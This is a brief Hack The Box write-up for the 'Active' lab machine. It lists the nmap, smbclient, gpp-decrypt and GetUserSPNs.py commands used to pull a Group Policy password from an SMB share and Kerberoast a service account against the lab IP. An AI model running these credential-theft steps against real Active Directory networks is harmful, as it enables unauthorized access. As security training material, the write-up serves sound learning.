HTB Active Box Walkthrough
Step-by-step walkthrough of the Active box from Hack The Box.
HTBActive DirectoryKerberoasting
HTB Active Box Walkthrough
Detailed walkthrough of exploiting the Active machine on Hack The Box.
Reconnaissance
nmap -sC -sV -oA active 10.10.10.100Key findings:
- SMB shares accessible
- Active Directory domain
- Kerberos authentication
Initial Access
SMB Enumeration
smbclient -L //10.10.10.100 -Nsmbclient //10.10.10.100/Replication -NFound interesting file: Groups.xml with encrypted password.
GPP Password Decryption
gpp-decrypt [encrypted_password]Privilege Escalation
Kerberoasting Attack
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGSCrack the TGS ticket with hashcat.
Lessons Learned
- Always enumerate SMB shares thoroughly
- GPP passwords are a common finding in older AD environments
- Kerberoasting is effective against service accounts